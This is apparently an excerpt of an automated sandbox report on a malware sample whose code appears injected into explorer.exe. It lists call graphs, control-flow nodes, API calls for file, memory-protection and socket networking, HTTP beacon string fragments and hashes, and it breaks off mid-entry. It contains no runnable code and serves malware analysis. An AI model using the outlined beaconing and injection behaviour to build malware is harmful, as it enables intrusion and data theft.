fba0df0 13796->13797 13798 fba4382 ObtainUserAgentString 13797->13798 13799 fba0ecd 13797->13799 13798->13799 13477 fb9d2dd 13481 fb9d31a 13477->13481 13478 fb9d3fa 13479 fb9d328 SleepEx 13479->13479 13479->13481 13481->13478 13481->13479 13484 fba7f12 13481->13484 13493 fb9e432 13481->13493 13503 fb9d0f2 13481->13503 13485 fba7f48 13484->13485 13488 fba80e9 13485->13488 13491 fba8134 13485->13491 13492 fba8232 NtCreateFile 13485->13492 13509 fba8f82 13485->13509 13486 fba8125 13529 fba7922 13486->13529 13488->13486 13521 fba7842 13488->13521 13491->13481 13492->13485 13494 fb9e45b 13493->13494 13502 fb9e4c9 13493->13502 13495 fba8232 NtCreateFile 13494->13495 13494->13502 13496 fb9e496 13495->13496 13497 fb9e4c5 13496->13497 13550 fb9e082 13496->13550 13499 fba8232 NtCreateFile 13497->13499 13497->13502 13499->13502 13500 fb9e4b6 13500->13497 13559 fb9df52 13500->13559 13502->13481 13504 fb9d109 13503->13504 13505 fb9d1d3 13503->13505 13564 fb9d012 13504->13564 13505->13481 13507 fb9d113 13507->13505 13508 fba8f82 6 API calls 13507->13508 13508->13505 13510 fba8fb8 13509->13510 13513 fba9081 13510->13513 13520 fba9022 13510->13520 13537 fba55b2 13510->13537 13512 fba9134 13519 fba91b2 13512->13519 13512->13520 13540 fba5732 13512->13540 13513->13512 13515 fba9117 getaddrinfo 13513->13515 13513->13520 13515->13512 13517 fba97f4 setsockopt recv 13517->13520 13518 fba9729 13518->13517 13518->13520 13519->13520 13543 fba56b2 13519->13543 13520->13485 13522 fba786d 13521->13522 13546 fba8232 13522->13546 13524 fba7906 13524->13488 13525 fba7888 13525->13524 13526 fba8f82 6 API calls 13525->13526 13527 fba78c5 13525->13527 13526->13527 13527->13524 13528 fba8232 NtCreateFile 13527->13528 13528->13524 13530 fba79c2 13529->13530 13531 fba8232 NtCreateFile 13530->13531 13533 fba79d6 13531->13533 13532 fba7a9f 13532->13491 13533->13532 13534 fba7a5d 13533->13534 13536 fba8f82 6 API calls 13533->13536 13534->13532 13535 fba8232 NtCreateFile 13534->13535 13535->13532 13536->13534 13538 fba560a socket 13537->13538 13539 fba55ec 13537->13539 13538->13513 13539->13538 13541 fba576a 13540->13541 13542 fba5788 connect 13540->13542 13541->13542 13542->13519 13544 fba56e7 13543->13544 13545 fba5705 send 13543->13545 13544->13545 13545->13518 13548 fba825c 13546->13548 13549 fba8334 13546->13549 13547 fba8410 NtCreateFile 13547->13549 13548->13547 13548->13549 13549->13525 13551 fb9e420 13550->13551 13552 fb9e0aa 13550->13552 13551->13500 13552->13551 13553 fba8232 NtCreateFile 13552->13553 13555 fb9e1f9 13553->13555 13554 fb9e3df 13554->13500 13555->13554 13556 fba8232 NtCreateFile 13555->13556 13557 fb9e3c9 13556->13557 13558 fba8232 NtCreateFile 13557->13558 13558->13554 13560 fb9df70 13559->13560 13561 fb9df84 13559->13561 13560->13497 13562 fba8232 NtCreateFile 13561->13562 13563 fb9e046 13562->13563 13563->13497 13565 fb9d031 13564->13565 13566 fb9d0cd 13565->13566 13567 fba8f82 6 API calls 13565->13567 13566->13507 13567->13566 13947 fbaaa1f 13948 fbaaa25 13947->13948 13951 fb9e5f2 13948->13951 13950 fbaaa3d 13952 fb9e5fb 13951->13952 13953 fb9e60e 13951->13953 13952->13953 13954 fba3662 6 API calls 13952->13954 13953->13950 13954->13953 13915 fba0edd 13917 fba0f06 13915->13917 13916 fba0fa4 13917->13916 13918 fb9d8f2 NtProtectVirtualMemory 13917->13918 13919 fba0f9c 13918->13919 13920 fba4382 ObtainUserAgentString 13919->13920 13920->13916 13736 fba9e12 13737 fba8942 13736->13737 13738 fba9e45 NtProtectVirtualMemory 13737->13738 13739 fba9e70 13738->13739 13955 fb9e613 13957 fb9e620 13955->13957 13956 fb9e67e 13957->13956 13958 fba9e12 NtProtectVirtualMemory 13957->13958 13958->13957 13921 fba2cd4 13923 fba2cd8 13921->13923 13922 fba3022 13923->13922 13924 fba2352 NtCreateFile 13923->13924 13925 fba2f0d 13924->13925 13925->13922 13926 fba2792 NtCreateFile 13925->13926 13926->13925 13823 fba214a 13824 fba2153 13823->13824 13829 fba2174 13823->13829 13825 fba4382 ObtainUserAgentString 13824->13825 13827 fba216c 13825->13827 13826 fba21e7 13828 fb9d0f2 6 API calls 13827->13828 13828->13829 13829->13826 13831 fb9d1f2 13829->13831 13832 fb9d20f 13831->13832 13833 fb9d2c9 13831->13833 13834 fb9d242 13832->13834 13835 fba7f12 7 API calls 13832->13835 13833->13829 13837 fb9e432 NtCreateFile 13834->13837 13838 fb9d289 13834->13838 13835->13834 13836 fb9d0f2 6 API calls 13836->13833 13837->13838 13838->13833 13838->13836 13959 fba9e0a 13960 fba9e45 NtProtectVirtualMemory 13959->13960 13961 fba8942 13959->13961 13962 fba9e70 13960->13962 13961->13960 13963 fbaaa4d 13964 fbaaa53 13963->13964 13967 fb9e782 13964->13967 13966 fbaaa6b 13969 fb9e78f 13967->13969 13968 fb9e7ad 13968->13966 13969->13968 13970 fba3662 6 API calls 13969->13970 13970->13968 13716 fba8f82 13717 fba8fb8 13716->13717 13718 fba55b2 socket 13717->13718 13720 fba9081 13717->13720 13727 fba9022 13717->13727 13718->13720 13719 fba9134 13721 fba5732 connect 13719->13721 13726 fba91b2 13719->13726 13719->13727 13720->13719 13722 fba9117 getaddrinfo 13720->13722 13720->13727 13721->13726 13722->13719 13723 fba56b2 send 13725 fba9729 13723->13725 13724 fba97f4 setsockopt recv 13724->13727 13725->13724 13725->13727 13726->13723 13726->13727

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 0FBA8F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 0 fba8f82-fba8fb6 1 fba8fb8-fba8fbc 0->1 2 fba8fd6-fba8fd9 0->2 1->2 3 fba8fbe-fba8fc2 1->3 4 fba98fe-fba990c 2->4 5 fba8fdf-fba8fed 2->5 3->2 6 fba8fc4-fba8fc8 3->6 7 fba8ff3-fba8ff7 5->7 8 fba98f6-fba98f7 5->8 6->2 9 fba8fca-fba8fce 6->9 10 fba8ff9-fba8ffd 7->10 11 fba8fff-fba9000 7->11 8->4 9->2 12 fba8fd0-fba8fd4 9->12 10->11 13 fba900a-fba9010 10->13 11->13 12->2 12->5 14 fba903a-fba9060 13->14 15 fba9012-fba9020 13->15 16 fba9068-fba907c call fba55b2 14->16 17 fba9062-fba9066 14->17 15->14 18 fba9022-fba9026 15->18 22 fba9081-fba90a2 16->22 17->16 19 fba90a8-fba90ab 17->19 18->8 21 fba902c-fba9035 18->21 23 fba90b1-fba90b8 19->23 24 fba9144-fba9150 19->24 21->8 22->19 25 fba98ee-fba98ef 22->25 27 fba90ba-fba90dc call fba8942 23->27 28 fba90e2-fba90f5 23->28 24->25 26 fba9156-fba9165 24->26 25->8 29 fba917f-fba918f 26->29 30 fba9167-fba9178 call fba5552 26->30 27->28 28->25 32 fba90fb-fba9101 28->32 34 fba9191-fba91ad call fba5732 29->34 35 fba91e5-fba921b 29->35 30->29 32->25 37 fba9107-fba9109 32->37 43 fba91b2-fba91da 34->43 40 fba922d-fba9231 35->40 41 fba921d-fba922b 35->41 37->25 42 fba910f-fba9111 37->42 45 fba9233-fba9245 40->45 46 fba9247-fba924b 40->46 44 fba927f-fba9280 41->44 42->25 47 fba9117-fba9132 getaddrinfo 42->47 43->35 49 fba91dc-fba91e1 43->49 48 fba9283-fba92e0 call fba9d62 call fba6482 call fba5e72 call fbaa002 44->48 45->44 50 fba924d-fba925f 46->50 51 fba9261-fba9265 46->51 47->24 52 fba9134-fba913c 47->52 63 fba92e2-fba92e6 48->63 64 fba92f4-fba9354 call fba9d92 48->64 49->35 50->44 53 fba926d-fba9279 51->53 54 fba9267-fba926b 51->54 52->24 53->44 54->48 54->53 63->64 66 fba92e8-fba92ef call fba6042 63->66 69 fba935a-fba9396 call fba9d62 call fbaa262 call fbaa002 64->69 70 fba948c-fba94b8 call fba9d62 call fbaa262 64->70 66->64 85 fba93bb-fba93e9 call fbaa262 * 2 69->85 86 fba9398-fba93b7 call fbaa262 call fbaa002 69->86 79 fba94ba-fba94d5 70->79 80 fba94d9-fba9590 call fbaa262 * 3 call fbaa002 * 2 call fba6482 70->80 79->80 112 fba9595-fba95b9 call fbaa262 80->112 101 fba93eb-fba9410 call fbaa002 call fbaa262 85->101 102 fba9415-fba941d 85->102 86->85 101->102 105 fba941f-fba9425 102->105 106 fba9442-fba9448 102->106 109 fba9467-fba9487 call fbaa262 105->109 110 fba9427-fba943d 105->110 111 fba944e-fba9456 106->111 106->112 109->112 110->112 111->112 116 fba945c-fba945d 111->116 121 fba95bb-fba95cc call fbaa262 call fbaa002 112->121 122 fba95d1-fba96ad call fbaa262 * 7 call fbaa002 call fba9d62 call fbaa002 call fba5e72 call fba6042 112->122 116->109 133 fba96af-fba96b3 121->133 122->133 135 fba96ff-fba972d call fba56b2 133->135 136 fba96b5-fba96fa call fba5382 call fba57b2 133->136 143 fba972f-fba9735 135->143 144 fba975d-fba9761 135->144 158 fba98e6-fba98e7 136->158 143->144 147 fba9737-fba974c 143->147 148 fba990d-fba9913 144->148 149 fba9767-fba976b 144->149 147->144 152 fba974e-fba9754 147->152 153 fba9779-fba9784 148->153 154 fba9919-fba9920 148->154 155 fba98aa-fba98df call fba57b2 149->155 156 fba9771-fba9773 149->156 152->144 159 fba9756 152->159 160 fba9786-fba9793 153->160 161 fba9795-fba9796 153->161 154->160 155->158 156->153 156->155 158->25 159->144 160->161 164 fba979c-fba97a0 160->164 161->164 167 fba97a2-fba97af 164->167 168 fba97b1-fba97b2 164->168 167->168 170 fba97b8-fba97c4 167->170 168->170 172 fba97c6-fba97ef call fba9d92 call fba9d62 170->172 173 fba97f4-fba9861 setsockopt recv 170->173 172->173 177 fba98a3-fba98a4 173->177 178 fba9863 173->178 177->155 178->177 181 fba9865-fba986a 178->181 181->177 184 fba986c-fba9872 181->184 184->177 186 fba9874-fba98a1 184->186 186->177 186->178
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: getaddrinforecvsetsockopt
                                                                                                                                                                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                                  • API String ID: 1564272048-1117930895
                                                                                                                                                                                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                  • Instruction ID: adc72e1cb1b57d6fa752f4858f00b4d3be6875b64745b463f2137d7a784422c3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B529F30618B088FCB29EF68D4847EAB7E1FB54300F5046AEC49FCB146DE35A949DB91
                                                                                                                                                                                  Function 0FBA8232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 299 fba8232-fba8256 300 fba825c-fba8260 299->300 301 fba88bd-fba88cd 299->301 300->301 302 fba8266-fba82a0 300->302 303 fba82bf 302->303 304 fba82a2-fba82a6 302->304 306 fba82c6 303->306 304->303 305 fba82a8-fba82ac 304->305 307 fba82ae-fba82b2 305->307 308 fba82b4-fba82b8 305->308 309 fba82cb-fba82cf 306->309 307->306 308->309 310 fba82ba-fba82bd 308->310 311 fba82f9-fba830b 309->311 312 fba82d1-fba82f7 call fba8942 309->312 310->309 316 fba8378 311->316 317 fba830d-fba8332 311->317 312->311 312->316 318 fba837a-fba83a0 316->318 319 fba83a1-fba83a8 317->319 320 fba8334-fba833b 317->320 321 fba83aa-fba83d3 call fba8942 319->321 322 fba83d5-fba83dc 319->322 323 fba833d-fba8360 call fba8942 320->323 324 fba8366-fba8370 320->324 321->316 321->322 328 fba83de-fba840a call fba8942 322->328 329 fba8410-fba8458 NtCreateFile call fba8172 322->329 323->324 324->316 326 fba8372-fba8373 324->326 326->316 328->316 328->329 334 fba845d-fba845f 329->334 334->316 336 fba8465-fba846d 334->336 336->316 337 fba8473-fba8476 336->337 338 fba8478-fba8481 337->338 339 fba8486-fba848d 337->339 338->318 340 fba848f-fba84b8 call fba8942 339->340 341 fba84c2-fba84ec 339->341 340->316 346 fba84be-fba84bf 340->346 347 fba88ae-fba88b8 341->347 348 fba84f2-fba84f5 341->348 346->341 347->316 349 fba84fb-fba84fe 348->349 350 fba8604-fba8611 348->350 351 fba855e-fba8561 349->351 352 fba8500-fba8507 349->352 350->318 357 fba8616-fba8619 351->357 358 fba8567-fba8572 351->358 354 fba8538-fba8559 352->354 355 fba8509-fba8532 call fba8942 352->355 362 fba85e9-fba85fa 354->362 355->316 355->354 360 fba86b8-fba86bb 357->360 361 fba861f-fba8626 357->361 363 fba85a3-fba85a6 358->363 364 fba8574-fba859d call fba8942 358->364 365 fba8739-fba873c 360->365 366 fba86bd-fba86c4 360->366 368 fba8628-fba8651 call fba8942 361->368 369 fba8657-fba866b call fba9e92 361->369 362->350 363->316 371 fba85ac-fba85b6 363->371 364->316 364->363 375 fba8742-fba8749 365->375 376 fba87c4-fba87c7 365->376 372 fba86c6-fba86ef call fba8942 366->372 373 fba86f5-fba8734 366->373 368->316 368->369 369->316 391 fba8671-fba86b3 369->391 371->316 379 fba85bc-fba85e6 371->379 372->347 372->373 395 fba8894-fba88a9 373->395 383 fba877a-fba87bf 375->383 384 fba874b-fba8774 call fba8942 375->384 376->316 380 fba87cd-fba87d4 376->380 379->362 386 fba87fc-fba8803 380->386 387 fba87d6-fba87f6 call fba8942 380->387 383->395 384->347 384->383 393 fba882b-fba8835 386->393 394 fba8805-fba8825 call fba8942 386->394 387->386 391->318 393->347 400 fba8837-fba883e 393->400 394->393 395->318 400->347 404 fba8840-fba8886 400->404 404->395
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID: `
                                                                                                                                                                                  • API String ID: 823142352-2679148245
                                                                                                                                                                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                  • Instruction ID: 94d13557e99ff7fe2420edea372537b383010d550e727523ac4e44c787e226d9
                                                                                                                                                                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                  • Instruction Fuzzy Hash: FE225970A18F099FCB59EF28D4886AAF7E1FB98301F80026EE45ED7651DB31E451CB85
                                                                                                                                                                                  Function 0FBA9E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 443 fba9e12-fba9e6e call fba8942 NtProtectVirtualMemory 446 fba9e7d-fba9e8f 443->446 447 fba9e70-fba9e7c 443->447
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 0FBA9E67
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                  • Instruction ID: d7e69e934bef4bfacae58bfc8db0ba1695681777f7d43883fa37a9070ad1b6c7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 93019E34628B484F8B88EF6CE48012AB7E4FBC9215F000B3EA99AC3251EB64C5414B42
                                                                                                                                                                                  Function 0FBA9E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 448 fba9e0a-fba9e38 449 fba9e45-fba9e6e NtProtectVirtualMemory 448->449 450 fba9e40 call fba8942 448->450 451 fba9e7d-fba9e8f 449->451 452 fba9e70-fba9e7c 449->452 450->449
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 0FBA9E67
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                                                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                  • Instruction ID: 7ecd2fe94fce218bc90cbc65f0ed8c54637335b09189e954dd00d3d21b3bed9c
                                                                                                                                                                                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A01A73462CB884B8B48EB7C94411A6B3E5FBCE314F000B7EE59AC3241DB25D5014B82
                                                                                                                                                                                  Function 0FBA38C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 0FBA39A0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AgentObtainStringUser
                                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                  • API String ID: 2681117516-319646191
                                                                                                                                                                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                  • Instruction ID: b8abffa7a978b271bd978b09b52d2bfbcc6170ea3ebc6d20754c578345392ad3
                                                                                                                                                                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C31F130618B0C8FCB10EFA8D8847EDB7E4FB58204F40026AD55EE7241DF798644CB99
                                                                                                                                                                                  Function 0FBA38BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 0FBA39A0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AgentObtainStringUser
                                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                  • API String ID: 2681117516-319646191
                                                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                  • Instruction ID: bab773f8eebb5c5cea01ce2aef83449c3c68a65fa8cd7ebcbd588f99600d8675
                                                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA210430618B0C8FCB14EFA8D8847EDBBE4FF58204F40026AD45AE7241DF798644CB99
                                                                                                                                                                                  Function 0FB9FB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 232 fb9fb66-fb9fb68 233 fb9fb6a-fb9fb71 232->233 234 fb9fb93-fb9fbb8 232->234 236 fb9fbbb-fb9fc22 call fba6612 call fba8942 * 2 233->236 237 fb9fb73-fb9fb92 233->237 234->236 244 fb9fc28-fb9fc2b 236->244 245 fb9fcdc 236->245 237->234 244->245 246 fb9fc31-fb9fcb0 call fbaada4 call fbaa022 call fbaa3e2 call fbaa022 call fbaa3e2 244->246 247 fb9fcde-fb9fcf6 245->247 259 fb9fcb5-fb9fcca CreateMutexExW 246->259 260 fb9fcce-fb9fcd3 259->260 260->245 261 fb9fcd5-fb9fcda 260->261 261->247
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                                                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                  • Instruction ID: 31580852f2caea67b2feed301d41ff39bfa1d35b8ccd710059a974e4874e0d2e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                  • Instruction Fuzzy Hash: C4417870918A08CFCF94EFA8D8987AD77F0FB58301F4441BAC84ADB216DA349945CB91
                                                                                                                                                                                  Function 0FB9FB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                                                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                  • Instruction ID: 0192fd6840814bf5e9dd5e2f56f70bfba33d1a5be623568eaf32c27f0397ba4b
                                                                                                                                                                                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                  • Instruction Fuzzy Hash: 71416970918A088FCB94EFA8D4987ED77F0FB58300F0441BAC84EDB256DA349945CB95
                                                                                                                                                                                  Function 0FBA572E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 289 fba572e-fba5768 290 fba576a-fba5782 call fba8942 289->290 291 fba5788-fba57ab connect 289->291 290->291
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: connect
                                                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                                                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                                  • Instruction ID: 8bb8bff4984f6f0ce39d4f9f992fa81d29c03748db6039b7e9c05220306aa750
                                                                                                                                                                                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 73015A30618B188FCB94EF5CE088B55B7E0FB58324F1545AEE90DCB226CA74D9818BC2
                                                                                                                                                                                  Function 0FBA5732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 294 fba5732-fba5768 295 fba576a-fba5782 call fba8942 294->295 296 fba5788-fba57ab connect 294->296 295->296
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: connect
                                                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                                                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                                  • Instruction ID: f7b58716dda28542808f8b7ed226bb8e8cb41cd4848c561392c98f19a8c0a2c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 98012C70618A1C8FCB94EF5CE088B55B7E0FB59315F1545AEA80DCB226CA74C9818BC2
                                                                                                                                                                                  Function 0FBA56B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 407 fba56b2-fba56e5 408 fba56e7-fba56ff call fba8942 407->408 409 fba5705-fba572d send 407->409 408->409
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: send
                                                                                                                                                                                  • String ID: send
                                                                                                                                                                                  • API String ID: 2809346765-2809346765
                                                                                                                                                                                  • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
